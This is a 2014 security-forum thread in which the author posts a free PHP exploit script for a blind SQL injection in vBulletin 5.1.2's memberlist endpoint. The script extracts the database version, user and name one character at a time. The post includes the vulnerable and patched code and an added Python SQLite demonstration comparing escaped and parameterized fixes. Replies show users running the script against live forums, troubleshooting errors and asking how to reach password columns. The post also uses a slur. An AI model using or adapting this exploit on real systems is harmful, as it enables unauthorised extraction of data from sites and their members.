Nytro Posted July 20, 2014 (edited)

Some idiots are trying to sell it: http://1337day.com/exploits/22452 For $2000. Gay.

Here it is. Free.

[phpcode]
<?php
/*
 Author: Nytro
 Powered by: Romanian Security Team
 Price: Free. Educational.
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Get arguments. Run from the console: php script.php https://target/forum
// A trailing slash on the URL would break both the request path and the markup match below.
$target_url = isset($argv[1]) ? rtrim($argv[1], '/') : 'https://rstforums.com/v5';
// The endpoint answers with JSON, so every "/" of the URL appears as "\/" in the returned HTML
$expression = str_replace('/', '\\/', $target_url);

// Function to send a POST request
function httpPost($url, $params)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));
    $output = curl_exec($ch);
    if ($output === false) {
        print htmlspecialchars(curl_error($ch));
    }
    curl_close($ch);
    return $output;
}

// Function to get string between two other strings
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) {
        return "";
    }
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}

// Boolean-based extraction through the unescaped "startswith" filter:
// each request asks for the users whose first letter equals character $letter of $sql_expr,
// so the first letter of any returned username IS that character.
function extract_value($target_url, $expression, $sql_expr)
{
    $value = '';
    $letter = 1;
    while (true) {
        $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(' . $sql_expr . ',' . $letter . ',1)--+"+'
            . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
        // Stop when no username starts with the requested character:
        // either the value has ended, or no account begins with that character
        if ($result === false || strpos($result, 'No Users Matched Your Query') !== false) {
            break;
        }
        $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
        if (!isset($exploded[1])) {
            break; // markup not found: different vBulletin version or patched target
        }
        $username = get_string_between($exploded[1], '">', '<\/a>');
        if ($username === '') {
            break;
        }
        print $username[0];
        $value .= $username[0];
        $letter++;
    }
    return $value;
}

print "\r\nRomanian Security Team - vBulletin 5.1.2 SQL Injection\r\n\r\n";

// Get version
print "Version: ";
extract_value($target_url, $expression, 'version()');

// Get user
print "\r\nUser: ";
extract_value($target_url, $expression, 'user()');

// Get database
print "\r\nDatabase: ";
extract_value($target_url, $expression, 'database()');

print "\r\n";
?>
[/phpcode]

More details:

The query was the following:

SELECT user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options, user.posts, user.joindate, user.usertitle, user.reputation, session.lastactivity AS lastvisit, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid FROM user AS user LEFT JOIN session AS session ON session.userid = user.userid WHERE user.username LIKE "D%" GROUP BY user.userid ORDER BY user.username ASC LIMIT 0, 10;

The "D" is the controlled parameter. And the quote (") was NOT escaped.

The query was generated with a function from querydefs.php:

public function fetchMemberList($params, $db, $check_only = false)

The vulnerable code:

if (!empty($params['startswith']))
{
    if ($params['startswith'] == '#')
    {
        $where[] = 'user.username REGEXP "^[^a-z].?"';
    }
    else
    {
        $where[] = 'user.username LIKE "' . $params['startswith'] . '%"';
    }
}

And the patch contains the fix:

if (!empty($params['startswith']))
{
    if ($params['startswith'] == '#')
    {
        $where[] = 'user.username REGEXP "^[^a-z].?"';
    }
    else
    {
        $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';
    }
}

So now the value is escaped and the SQL injection is fixed. The vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst

Edited July 20, 2014 by Nytro
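The post shows the injection point and the script that abuses it, but not why one request per character is enough, nor what the escaping in the patch actually buys. The following is an added example, written for this page and not code from the post or from vBulletin: it rebuilds the shape of fetchMemberList() over an in-memory SQLite table with constructed sample accounts, runs the same first-letter oracle the script uses, and then repeats it against an escaped version (a hypothetical stand-in for $db->escape_string_like(), which is not reproduced here) and against a bound parameter. Two deliberate differences from MySQL: the pattern is wrapped in single quotes because SQLite reads double-quoted strings as identifiers (MySQL accepts both), and SQLite compares case-sensitively, while vBulletin's MySQL collation would not. The second secret also shows the script's blind spot: extraction stops at the first character that no username begins with, which is why it stops at "-" in a version string.

```python
import sqlite3

# Constructed sample data (not from the page): a handful of accounts as in a
# forum's user table, plus a settings table standing in for version()/database().
USERS = ["admin", "bob", "carol", "dave", "eve", "nytro", "victor", "zed",
         ".dot", "1337", "2fa", "3des", "5cent", "7zip"]
SETTINGS = {"dbname": "vb5.1.2", "version": "5.5.37-log"}

# Scalar subqueries playing the role of version()/user()/database() in the post's payload.
DBNAME_EXPR = "(SELECT value FROM setting WHERE varname='dbname')"
VERSION_EXPR = "(SELECT value FROM setting WHERE varname='version')"


def connect():
    """In-memory SQLite database loaded with the constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT)")
    db.executemany("INSERT INTO user (username) VALUES (?)", [(u,) for u in USERS])
    db.execute("CREATE TABLE setting (varname TEXT, value TEXT)")
    db.executemany("INSERT INTO setting VALUES (?, ?)", SETTINGS.items())
    return db


def fetch_member_list_vulnerable(db, startswith):
    """Shape of the unpatched fetchMemberList(): the filter value is concatenated
    straight into the LIKE pattern (single quotes: SQLite treats "..." as identifiers)."""
    sql = ("SELECT username FROM user WHERE username LIKE '" + startswith +
           "%' ORDER BY username ASC LIMIT 10")
    return [row[0] for row in db.execute(sql)]


def escape_like_wildcards(s):
    """Escape the LIKE metacharacters so the value matches literally (used with ESCAPE '\\')."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def escape_string_like(s):
    """Hypothetical stand-in for vBulletin's $db->escape_string_like(): SQL-quote
    the value and neutralise the LIKE wildcards. Not the vendor's code."""
    return escape_like_wildcards(s).replace("'", "''")


def fetch_member_list_patched(db, startswith):
    """Vendor-style fix: still concatenation, but the value can only be a literal prefix."""
    sql = ("SELECT username FROM user WHERE username LIKE '" + escape_string_like(startswith) +
           "%' ESCAPE '\\' ORDER BY username ASC LIMIT 10")
    return [row[0] for row in db.execute(sql)]


def fetch_member_list_parameterized(db, startswith):
    """Stronger fix: bind the pattern, so user input never reaches the SQL parser at all."""
    pattern = escape_like_wildcards(startswith) + "%"
    sql = "SELECT username FROM user WHERE username LIKE ? ESCAPE '\\' ORDER BY username ASC LIMIT 10"
    return [row[0] for row in db.execute(sql, (pattern,))]


def payload(position, target_expr):
    """Same shape as the post's startswith value: close the string, OR in a comparison
    of every username's first character with character `position` of the target,
    and comment out the trailing wildcard, quote and the rest of the query."""
    return ("' OR SUBSTR(user.username,1,1)=SUBSTR(" + target_expr + "," +
            str(position) + ",1)-- ")


def extract(fetch, db, target_expr, max_len=64):
    """Blind extraction exactly as the post's script does it: every returned user
    shares the same first character, which is the next character of the secret.
    Ends at the end of the value, or early when no username begins with the
    character that is needed (the 'No Users Matched Your Query' case)."""
    recovered = ""
    for position in range(1, max_len + 1):
        rows = fetch(db, payload(position, target_expr))
        if not rows:
            break
        recovered += rows[0][0]
    return recovered


if __name__ == "__main__":
    db = connect()
    print("vulnerable, dbname :", extract(fetch_member_list_vulnerable, db, DBNAME_EXPR))
    print("vulnerable, version:", extract(fetch_member_list_vulnerable, db, VERSION_EXPR),
          "(stops at '-': no sample username starts with it)")
    print("patched, dbname    :", repr(extract(fetch_member_list_patched, db, DBNAME_EXPR)))
    print("parameterized      :", repr(extract(fetch_member_list_parameterized, db, DBNAME_EXPR)))
```

The escaped variant is what the patch quoted above does; it works because the quote can no longer terminate the string and `%`/`_` can no longer widen the prefix. Binding the pattern is preferable where the database layer allows it, since it does not depend on the escaping routine matching the server's quoting rules. Note also that the oracle's alphabet is the set of first characters of existing usernames, so a target with few or uniformly named accounts leaks less than this sample does.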
Byte-ul Posted July 20, 2014

Haha, even the video is yours :) Good job. Send the 1337day people an email and tell them to take it down.
Nytro (Author) Posted July 20, 2014

Nope, let them embarrass themselves. As you can see, the exploit is TRIVIAL. And it is not useful, there are too few forums running vBulletin 5. I will add more details when I get to Bucharest.
.Breacker Posted July 20, 2014

Do the 1337day people have nothing to eat? @Nytro, now you will see only "quality" show-offs, many of them have gaming forums running on vBulletin.
io.kent Posted July 20, 2014

I love this news, Nytro. A huge pint of beer on me.
cybermist Posted July 20, 2014

PHP Fatal error: Call to undefined function curl_init() in root/phpfilename.php
Help!!
Dragos (Moderator) Posted July 20, 2014

PHP Fatal error: Call to undefined function curl_init() in root/phpfilename.php Help!!

How to enable cURL in PHP / XAMPP - Stack Overflow
pr0fw3b Posted July 20, 2014

Now the "hackers" are waiting for as many sites with vBulletin 5.1.2 as possible. But the thing is, many buy it while running an older version, and some wait in vain because they will not really exploit anything.
kumudam Posted July 20, 2014

Error:
Notice: Undefined offset: 1 in /root/script.php on line 90
PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91
SirGod Posted July 20, 2014

Error: Notice: Undefined offset: 1 in /root/script.php on line 90 PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91

You have to run it from the console:
php script.php http://site.com/forum
cybermist Posted July 20, 2014

Notice: Undefined offset: 1 in /root/vbexploit.php on line 179
PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181
Help
.Breacker Posted July 20, 2014

Notice: Undefined offset: 1 in /root/vbexploit.php on line 179 PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181 Help

SirGod already posted it above.
php exploitname.php http://www.yourwebsite.com/forum
cybermist Posted July 20, 2014

SirGod already posted it above. php exploitname.php http://www.yourwebsite.com/forum

Did the same thing but still get the error.
kumudam Posted July 20, 2014

Same error at lines 90 and 91. What could it be? Thanks for any help.
askwrite Posted July 20, 2014

You have to run it from the console, what is it you do not understand?
kumudam Posted July 20, 2014

I am running it from the console ... the error shows up in the console, instead of the result. What is it you do not understand???
SirGod Posted July 20, 2014

Stop trying it on other vBulletin versions and it will work. The script searches for a specific string, a string that is not present on all versions.

while(strpos($result, 'No Users Matched Your Query') == false)
Gorkha Posted July 20, 2014

Showing error
Notice: Uninitialized string offset: 0 in C:\xampp\htdocs\test\vb.php on line 91
after uncommenting ;extension=php_curl.dll in php.ini
nacks Posted July 20, 2014 (edited)

I also tried it on 5.1.2, but I get an error:
Notice: Undefined variable: username in /root/nytro.php on line 90
PHP Notice: Undefined variable: username in /root/nytro.php on line 91

Later edit: I think it has to do with the link where the "injection" is done ...

Edited July 20, 2014 by nacks
kempactick Posted July 20, 2014

Imagine someone buying it for $2000 when it has already been published by Nytro. :))
Nytro (Author) Posted July 20, 2014 (edited)

Note: danyweb managed to discover it before the 1337gay crowd. And he did not make it public, did not try to sell it...

Edit: I added details.

Edited July 20, 2014 by Nytro
jdsmith321 Posted July 20, 2014

This is cool man, you got my respect.
wor1 Posted July 21, 2014

Is there any protection on the password columns?
select salt from user where userid='1' (works)
select password from user where userid='1' (does not work)
Thanks for the exploit, nice find.
k3nt_black Posted July 22, 2014

root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/
Romanian Security Team - vBulltin 5.1.2 SQL Injection
Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92
Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92
PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93
Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93
PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92
Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92
PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93
Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

How do I fix this, Mr Nytro?